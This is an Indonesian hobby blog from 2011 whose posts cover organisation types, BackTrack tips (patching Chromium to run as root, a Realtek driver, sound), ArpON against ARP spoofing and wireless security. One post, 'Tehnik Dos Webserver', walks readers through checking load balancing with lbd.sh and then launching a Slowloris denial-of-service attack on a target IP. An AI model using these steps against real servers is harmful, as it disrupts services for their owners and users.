Ads 468x60px

Jumat, 28 Oktober 2011

Macam-macam tipe & bentuk organisasi

Tipe-tipe organisasi
  • Secara garis besar organisasi dapat dibedakan menjadi dua macam, yaitu organisasi formal dan organisasi informal. Pembagian tersebut tergantung pada tingkat atau derajat mereka terstruktur. Namur dalam kenyataannya tidak ada sebuah organisasi formal maupun informal yang sempurna.

Organisasi Formal
  • Organisasi formal memiliki suatu struktur yang terumuskan dengan baik, yang menerangkan hubungan-hubungan otoritasnya, kekuasaan, akuntabilitas dan tanggung jawabnya. Struktur yang ada juga menerangkan bagaimana bentuk saluran-saluran melalui apa komunikasi berlangsung. Kemudian menunjukkan tugas-tugas terspesifikasi bagi masing-masing anggotanya. Hierarki sasaran organisasi formal dinyatakan secara eksplisit. Status, prestise, imbalan, pangkat dan jabatan, serta prasarat lainya terurutkan dengan baik dan terkendali. Selain itu organisasi formal tahan lama dan mereka terencana dan mengingat bahwa ditekankan mereka beraturan, maka mereka relatif bersifat tidak fleksibel. Contoh organisasi formal ádalah perusahaan besar, badan-badan pemerintah, dan universitas-universitas (J Winardi, 2003:9).

Organisasi informal
  • Keanggotaan pada organisasi-organisasi informal dapat dicapai baik secara sadar maupun tidak sadar, dan kerap kali sulit untuk menentukan waktu eksak seseorang menjadi anggota organisasi tersebut. Sifat eksak hubungan antar anggota dan bahkan tujuan organisasi yang bersangkutan tidak terspesifikasi. Contoh organisasi informal adalah pertemuan tidak resmi seperti makan malam bersama. Organisasi informal dapat dialihkan menjadi organisasi formal apabila hubungan didalamnya dan kegiatan yang dilakukan terstruktur dan terumuskan. Selain itu, organisasi juga dibedakan menjadi organisasi primer dan organisasi sekunder menurut Hicks:
  1. Organisasi Primer, organisasi semacam ini menuntut keterlibatan secara lengkap, pribadi dan emosional anggotanya. Mereka berlandaskan ekspektasi rimbal balik dan bukan pada kewajiban yang dirumuskan dengan eksak. Contoh dari organisasi semacam ini adalah keluarga-keluarga tertentu.
  2. Organisasi Sekunder, organisasi sekunder memuat hubungan yang bersifat intelektual, rasional, dan kontraktual. Organisasi seperti ini tidak bertujuan memberikan kepuasan batiniyah, tapi mereka memiliki anggota karena dapat menyediakan alat-alat berupa gaji ataupun imbalan kepada anggotanya. Sebagai contoh organisasi ini adalah kontrak kerjasama antara majikan dengan calon karyawannya dimana harus saling setuju mengenai seberapa besar pembayaran gajinya.
Bentuk-bentuk organisasi
  1. Organisasi politik
    Organisasi politik adalah organisasi atau kelompok yang bergerak atau berkepentingan atau terlibat dalam proses politik dan dalam ilmu kenegaraan, secara aktif berperan dalam menentukan nasib bangsa tersebut.
  2. Organisasi sosial
    Organisasi sosial adalah perkumpulan sosial yang dibentuk oleh masyarakat, baik yang berbadan hukum maupun yang tidak berbadan hukum, yang berfungsi sebagai sarana partisipasi masyarakat dalam pembangunan bangsa dan negara.
  3. Organisasi mahasiswa
    Organisasi mahasiswa adalah organisasi yang beranggotakan mahasiswa. Organisasi ini dapat berupa organisasi kemahasiswaan intra kampus, organisasi kemahasiswaan ekstra kampus,
  4. Organisasi olahraga
    Organisasi olahraga adalah organisasi yang mencakup banyaknya cabang olahraga
  5. Organisasi sekolah
    Organisasi sekolah adalah organisasi yang beranggotakan murid-murid . organisasi ini bias berupa organisasi intra sekolah maupun organisasi intra sekolah .
  6. Organisasi negara
    Organisasi Negara adalah pengorganisasian masyarakat yang mempunyai rakyat dalam suatu wilayah tersebut, dengan sejumlah orang yang menerima keberadaan organisasi ini.

Struktur dan bagan organisasi

















Selasa, 25 Oktober 2011

Menjalankan Chrome di Backtrack

Untuk hanya menginstal google chrome pada Backtrack 5,

apt-get install chromium-browser

Namun, pengembang google chrome tidak mengizinkan hak akses root. Jika Anda mencoba untuk menjalankannya pada mundur, Anda akan mendapatkan pesan kesalahan,

Kromium tidak dapat dijalankan sebagai root
Silakan mulai Kromium sebagai user biasa. Jika sebelumnya Anda telah menjalankan Kromium sebagai root, Anda akan perlu mengubah kepemilikan direktori profil Anda.

Untuk memperbaiki ini, lebih baik mengatakan, untuk menjalankan krom dengan hak akses root, kita
perlu mengedit file hex biner, kromium-browser
Anda akan disajikan dengan layar di atas. Cukup rumit, isintit? Ini allowsyou untuk mengedit data di kedua modus heksadesimal dan dalam modus ASCII. Alat yang sangat baik dan berguna.
Sekarang kita beralih ke ASCII dengan menekan [TAB]

[Tab]

Perhatikan bahwa kursor bergeser ke pane kanan dari panel tengah. Sekarang Anda dapat mengedit dalam ascii. Untuk membatalkan perubahan Anda mungkin tidak sengaja membuat, tekan backspace.

ctrl + s untuk mencari geteuid

Sekarang, memodifikasi geteuid untuk getppid

Sekarang, ctrl + X untuk keluar dari menyimpan perubahan.
Dan, google chrome sekarang berjalan dengan hak akses root.

Untuk menjalankan vlc, mengikuti operasi yang sama pada / usr / bin / vlc
cd /usr/lib/chromium-browser
hexedit chromium-browser

Senin, 24 Oktober 2011

Anti Netcut di linux ArpOn

Buat yang sering pake wifi..hati hati karena wifi rentan terhadap serangan dari tangan tangan jahil,salah satu diantaranya yaitu NETCUT klo udah kena di jamin ga bakal bisa dapet koneksi wifi
apa itu NETCUT?
sejenis software Bekerja berdasarkan ARP (Address Resolution Protocol) Spoofing.Jadi dia mengelabuhi mac adress komputer satu Dengan IP adress Komputer lain.Misal, komputer A mau komunikasi ke B. Tapi, tiba2 si C mengangu komunikasi. Karena sebelumnya si C sudah sukses melakukan penyusupan di bagian ARP.
Jadi si C bisa suka aja mau diapain tuh data yang sudah di copet. Mau di putus, di sambung semua terserah padanya...
Pada backtrack jangan cuma bisa menyerang tapi kita harus bisa defense juga,kaya barcelona dengan gaya tikitakanya...nyerang ga ada matinya,tapi defense juga oke...hahaha.....untuk itu ada aplikasi software yang bisa
menangkal NETCUT yaitu ARPON yaudah kita praktekan dan install

1. Install arpon
Code:
sudo apt-get install arpon

2. Konfigurasi arpon
Code:
sudo gedit /etc/default/arpon

Ganti isi file /etc/default/arpon
Menjadi. .
# Defaults for arpon initscript
# sourced by /etc/init.d/arpon
# installed at /etc/default/arpon by the maintainer scripts
# You must choose between static ARP inspection (SARPI) and
# dynamic ARP inspection (DARPI)
##
For SARPI uncomment the following line
DAEMON_OPTS=”-d -f /var/log/arpon/arpon.log -g -s”
# For DARPI uncomment the following line
# DAEMON_OPTS=”-d -f /var/log/arpon/arpon.log -g -y”
# Modify to RUN=”yes” when you are ready
RUN=”yes”

3. Save, Exit.
4. Jalankan arpon
- Help Text
THJC@IBTeam:~$ arpon
ArpON "Arp handler inspection" version 1.90 (http://arpon.sourceforge.net)
Usage: arpon [Task Mode] [Log Mode] [Device] {[Arping] | [Sniffer] | [Arp
Cache] | [SARPI | DARPI]} [Misc]
TASK MODE:
-n, --nice Sets PID's CPU priority
(Default Nice: 0)
-d, --daemon Works in background task
(Default: /var/run/arpon.pid)
LOG MODE:
-f, --log-file Sets log file
(Default: /var/log/arpon.log)
-g, --log Works in logging mode
DEVICE MANAGER:
-i, --dev-manual Sets your valid device manually
-o, --dev-auto Sets valid device automatically
ARP PING:
-m, --ping-timeout Sets Arp Ping response timeout
(Default: 500 milliseconds)
-p, --ping-host Sends Arp Ping to Inet4 address
-b, --ping-broadcast Sends Arp Ping to Broadcast address
(Prints LAN's active hosts)
ARP PASSIVE SNIFFER:
-r, --sniff-arp Sniffs only Arp protocol
(I/O Arp Request/Reply)
ARP CACHE MANAGER:
-a, --cache-add <"Inet4 MAC"> Adds Inet4 and MAC Arp entry
-e, --cache-del Deletes Inet4 or MAC Arp entry
-t, --cache-list Prints total ARP Cache entries
STATIC ARP INSPECTION:
-u, --sarpi-timeout Sets Arp Cache refresh timeout
(Default: 10 minuts)
-s, --sarpi Manages Arp Cache statically
DYNAMIC ARP INSPECTION:
-z, --darpi-timeout Sets DARPI Cache entry timeout
(Default: 500 milliseconds)
-y, --darpi Manages Arp Cache dinamically
MISC:
-c, --license Prints license page
-v, --version Prints version number
-h, --help Prints help summary page
SEE THE MAN PAGE FOR MANY DESCRIPTIONS AND EXAMPLES
THJC@IBTeam:~$
ARP PING:
-m, --ping-timeout Sets Arp Ping response timeout
(Default: 500 milliseconds)
-p, --ping-host Sends Arp Ping to Inet4 address
-b, --ping-broadcast Sends Arp Ping to Broadcast address
(Prints LAN's active hosts)
ARP PASSIVE SNIFFER:
-r, --sniff-arp Sniffs only Arp protocol
(I/O Arp Request/Reply)
ARP CACHE MANAGER:
-a, --cache-add <"Inet4 MAC"> Adds Inet4 and MAC Arp entry
-e, --cache-del Deletes Inet4 or MAC Arp entry
-t, --cache-list Prints total ARP Cache entries
STATIC ARP INSPECTION:
-u, --sarpi-timeout Sets Arp Cache refresh timeout
(Default: 10 minuts)
-s, --sarpi Manages Arp Cache statically
DYNAMIC ARP INSPECTION:
-z, --darpi-timeout Sets DARPI Cache entry timeout
(Default: 500 milliseconds)
-y, --darpi Manages Arp Cache dinamically
MISC:
-c, --license Prints license page
-v, --version Prints version number
-h, --help Prints help summary page
SEE THE MAN PAGE FOR MANY DESCRIPTIONS AND EXAMPLES
THJC@IBTeam:~$

- Jalankan arpon statik dengan koneksi wlan0
sudo arpon -i wlan0 -s

- Jalankan arpon statik dengan koneksi eth0
sudo arpon -i eth0 -s

- Jalankan arpon dinamik dengan koneksi wlan0
sudo arpon -i wlan0 -y

- Jalankan arpon dinamik dengan koneksi eth0
sudo arpon -i eth0 -y

- Jalankan arpon statik dengan koneksi wlan0 [Background]
sudo arpon -i wlan0 -s -d

- Jalankan arpon statik dengan koneksi eth0 [Background]
udo arpon -i eth0 -s -d

- Jalankan arpon dinamik dengan koneksi wlan0 [Background]
sudo arpon -i wlan0 -y -d

5. Yap, linux anda sudah dilengkapi AntiNetcut

Penjelasan perbedaan Dinamik dengan Statik
  • ARP Dinamik : ARP kita berubah - ubah, jadi netcut tidak bisa berhasil mem-flooding ARP kita. Sehingga tidak memungkinkan untuk netcut berhasil mem-flood ARP kita
  • ARP Statik : ARP kita tetap, jadi netcut tidak bisa mengganti ARP kita ke gateaway yang salah. Kita tetap berjalan pada gateaway yang benar.

semoga bermanfaat

Rabu, 12 Oktober 2011

Metoda Mengamankan Jaringan Wireless

Setelah tutorial sebelumnya, yaitu bagaimana membangun sebuah hotspot sederhana, tentunya diperlukan sistem yang dapat mengamankan hotspot Wifi yang ada agar akses HotSpot wifi tersebut tidak digunakan oleh pihak yang tidak berhak selain anda sebagai pemilik HotSpot tersebut.

Faktanya adalah :

"Pada akhir tahun 2002, 30% dari seluruh perusahaan akan mengalami resiko keamanan yang signifikan karena telah mengimplementasikan 802.11b Wireless LAN (WLANs) tanpa sistem keamanan yang baik." Security Research and Advisory firm, Gartner Inc.

"Pelanggan bisnis saat ini keberatan untuk mengimplementasikan teknologi wireless karena faktanya adalah Wireless tidak aman, " -- Bill Rossi, vice president and general manager of Cisco's wireless networking operation.

"Kami mendatangi sebuah perusahaan dengan salah satu jaringan Wireless yang di implementasikan. Semua Source Code, semua tersedia. Jarigan Wireless mem-broadcast, "Masuklah ke sini".... secara mendasar mereka memiliki Rolls- Royce diparkir di pinggir jalan, mesin menyala, dengan tanda "curi saya." -- Thubten Comberford of White Hat Technologies, a wireless security firm.



Nah, Bagaimana caranya sih untuk mengamankan jaraingan Wifi? Pertanyaannya adalah Seberapa Penting keamanan di jaringan Wireless anda, apakah di rumah, kantor, cafe, Kampus, Rumah Sakit, Sekolah, dan lainnya. Jawaban atas pertanyaan tersebut akan menentukan sistem kemanan seperti apa yang akan anda implementasikan di jaringan wifi anda. Sebenarnya secara standart di setiap Wireless Router / Access Point sudah ada metoda pengamanannya, dimana tidak perlu diinstall software lagi. Namun hanya perlu diaktifkan saja. Semua metodanya sama, namun ada beberapa metoda baru yang tidak dimiliki oleh beberapa Access Point / Wireless Router.

Fitur keamanan ini berjalan di 802.11 , dimana merupakan standart komunikasi wireless / nirkabel yang di standarisasi oleh IEEE (institute of Electrical and Electronics Engineers) dan telah digunakan di seluruh dunia.

Berikut adalah Fitur pengamanan HotSpot diurutkan dari awal di implementasikan sebagai standart di jaringan Wifi :

WEP (Wireless Equivalent Privacy)
Merupakan Fitur kemanan pada jaringan Wireless / HotSpot yang pertama kali di implementasikan dan dijadikan standart internasional. Hampir semua perangkat Wireless memiliki metoda ini. WEP menggunakan Metoda enkripsi RC4 untuk mengacak / mengenkripsi data yang akan di lewatkan di jaraingan Wireless.
WPA ( Wi-Fi Protected Access)
WPA berdasarkan standart 802.11i dari IEEE. WPA ada 2 versi, dimana versi 1 mensupport beberapa metoda enkripsi yaitu :
TKIP (Temporal Key Integrity Protocol)
Dikembangkan untuk fitur WPA sebagai pengembangan dari WEP yang mana dapat diupgrade ke hardware 802.11melalui update firmware. merupakan bagian dari 802.11i.
AES-CCMP
WPA Enterprise menggunakan authentikasi berbasis Radius dengan standart 802.1x
WPA Personal menggunakan PSK (Pre Shared Key) untuk mengenkripsi data menggunakan Passphrase 8 sampai 63 karakter. Dapat juga menggunakan 64 karakter Hexadesimal. Passpharase yang lemah dapat ditembus menggunakan Dictionary attack (Database password). Namun WPA masih aman, bila digunakan dengan Passpharase yang "Baik" atau 64 karakter Hexadesimal yang tidak mudah diingat seorang manusia.
WPA + EAP (Extensible Authentication Protocol)
Banyak turunan dari pengembangan WPA + EAP misalnya EAP-MD5, PEAPv0, PEAPv1, EAP-MSCHAPv2, LEAP, EAP-FAST, EAP-TLS, EAP-TTLS, MSCHAv2, EAP-SIM, LEAP, PEAP, EAP-TLS.
LEAP (Lighweight Extensible Authentication Protocol) lebih aman daripada EAP-MD5 namun EAP-MD5 tidak aman dari cracker.
PEAP (Protected Extensible Authenticatoin Protocol) memungkinkan adanya jalur wireless yang aman untuk pertukaran data, password dan encryption key tanpa membutuhkan server sertifikat lagi. Fitur PEAP dikembangkan oleh CISCO, MICROSOFT dan RSA SECURITY.
EAP-TLS memberikan keamanan yang sangat baik karena authentikasi dua arah. Client dan Network di authentikasi menggunakan sertifikat dan WEP-KEY per Session.EAP juga menggunakan server authentikasi terpusat.

WPA v2 adalah merupakan versi keluaran Wifi Alliance dari standart final 802.11i.
Keduanya, WPA dan WPA2 mensupport authentikasi EAP menggunakan radius server dan PSK (Pre Shared Key).



Kesemua sistem pengamanan tersebut memiliki kelemahan dan kekuatan masing-masing yang mana dapat di tolerir pada satu kondisi namun pada kondisi lain tidak dapat ditolerir. Lalu dari semua fitur keamanan diatas, mana yang cocok digunakan untuk saya ? semua tergantung dari seberapa penting keamanan jaringan Wireless untuk anda.
BIla sangat penting, maka terapkanlah sistem yang paling secure saat ini, yaitu WPA + EAP menggunakan Radius, yaitu EAP-TLS. Tentunya berbeda bila jawabannya adalah sistem keamanan wireless tidak terlalu penting. Bila demikian anda dapat menggunakan metoda WEP atau WPA Personal.
Dan tentunya agar lebih sulit di Hack/ di tembus oleh cracker, gunakan Passpharase yang rumit dan jangan berupa kalimat. kalau bisa pada WPA gunakan 64 karakter Hexadesimal.

Tentunya bukan berarti tidak dapat di tembus, namun mempersulit cracker untuk menjebol jaringan wireless anda. Biasanya Jaringan WIreless mudah ditembus karena lemahnya passpharase yang digunakan. Dengan lemahnya Passpharase yang digunakan, seorang anak SMA dengan bermodal software cracker WEP/WPA , laptop, Wireless Device dan sebuah antena kaleng 15dBi saja sudah dapat menembus jaringan wireless tersebut dalam hitungan Menit.

Nah, kesimpulannya adalah sebagai berikut :

Gunakan Fitur keamanan yang ada dalam Hardware Wireless anda. Semakin mahal harga Hardwarenya, semakin lengkap fitur keamanannya. Anda mendapatkan sesuatu sesuai dengan harga yang anda bayarkan.
Gunakan Passpharase yang tidak mudah ditebak atau gunakan Full 64 karakter Hexadesimal untuk WPA key
Sebisa mungkin gunakan dan aktifkan fitur WPA
Bila memungkinkan , terapkan kemanan WPA dengan menggunakan EAP dan Radius server.
Lebih advanced lagi, gunakan Web Login HTTPS + Radius , seperti sistem 802.1x pada perusahaan besar.
Untuk web Login, and bisa menggunakan salah satu service yang indohotspot.net sediakan dengan biaya rendah tanpa memerlukan investasi server. Software dan server kami yang sediakan, dan anda hanya menggunakan wireless router yang support DDWRT versi Standart. Dengan demikian mengimplementasikan sistem keamanan yang reliable di jaringan WIreless anda tidak perlu mahal.
Berikan pengetahuan tentang sistem keamanan jaringan wirelss bagi user anda dan simpan user dan password dengan baik bila ada untuk mencegah kebocoran dari sisi user.

Demikian beberapa cara untuk mengamankan jaringan Wireless / HotSpot anda, baik untuk diterapkan di mana saja, apakah jaringan Wireless untuk sekolah, kantor, cafe, rumah sakit, hotel, apartemen, dan lainnya.
Bila sistem keamanan diterapkan dan diperhitungkan sebelum jaringan wireless di implementasikan, maka anda dapat tidur lebih nyenyak dengan mengetahui bahwa jaringan Wireless anda aman dari usaha penyusupan dan pencurian data.
Tentunya anda tak ingin di saat anda tidur terlelap, tanpa disadari ada yang berusaha menyusup ke jaringan Wireless anda dan melakukan pencurian data / bandwidth dari jarigan wireless anda bukan ?

Selasa, 11 Oktober 2011

Install REALTEK1801SE di Backtrack

Setelah anda install backtrack atau distro linux Adapter wirelessnya tidak bekerja.
Yang saya berikan di sini untuk tipe RealtekREALTEK1801SE,karena wirelless adapter ini tidak compitebel dengan backtrack, harus install manual

Cek status Wlan:

cek hardware(lihat tipe wirelles adapternya

jika hasilnya ini:

Buka terminal lalu ketikan code:
# apt-get install linux-headers
# ln -s /usr/src/linux-headers-2.6.39.4/ /lib/modules/2.6.39.4/build
# wget http://bt.gxrg.org/other/driver/wire...27.2010.tar.gz
# tar -xf rtl8192se_linux_2.6.0015.0127.2010.tar.gz
# cd rtl8192se_linux_2.6.0015.0127.2010
# make
# make install


selanjutnya restart linux anda

Jumat, 07 Oktober 2011

Tehnik Dos Webserver

Serangan Dos webvserver adalah Serangan yang paling baik dari dulu sampai saat ini bahkan paling di takuti oleh semua server bahkan situs jejaring sosial sekelas facebook yang isunya akan diserang oleh hacker anoniyomus takut dengan hal ini dan jika terkena serengan ini admin harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.

sebelunya istalldb_autopwn dulu fungsinya kita dapat menggurangi penggunaan waktu untuk melakukan serangan.
caranya ketikan pada terminal
root@bt:~# apt-get install libpgsql-ruby postgresql libpq-dev
root@bt:~# su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit

Sekarang baru deh Dos servernya
1. Download file lbd.sh dan slowloris.pl disini. kemudian unrar.
2. Cek Load-Balancing dari webserver target.

root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET

Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67
lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
Written by Stefan Behte (http://ge.mine.nu)
Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]:
Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.
root@bt:~/dos#

Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.

3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET

* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.

Berikut Videonya.



Terimakasih untuk abang abangan ono kita yang telah menurunkan ilmunya kepada saya.he

Sabtu, 01 Oktober 2011

Membesarkan volume suara linux

beberapa hari ini bingung juga ama si backtrack yang suaranya pelaaaannnnn banget :( (tapi bunyi).ternyata stelah saya baca di situs resminya Backtrack memang pada sound terdapat Bug, dan begini cara mengatasinya

1. buka system>prefences>Startup Aplications
2 pada tab Startup Program>add
Name : Pulseaudio daemon
Command : /usr/bin/pulseaudio
Commant : Start the sound daemon

akirnya sound saya kemmbali pulih.he tetapi saya belum puas akirnya setelah muter2 di google, akhirnya njeketek ketemu ama perintah Untuk Overclocking Sound alsamixer
yang akan menampilkan mixer soundcard yang akhirnya dapat mengatur besar – kecil nya suara dengan tombol panah atas / bawah :D

ketikan kode di bawah ini pada terminal backtrack



Highslide JS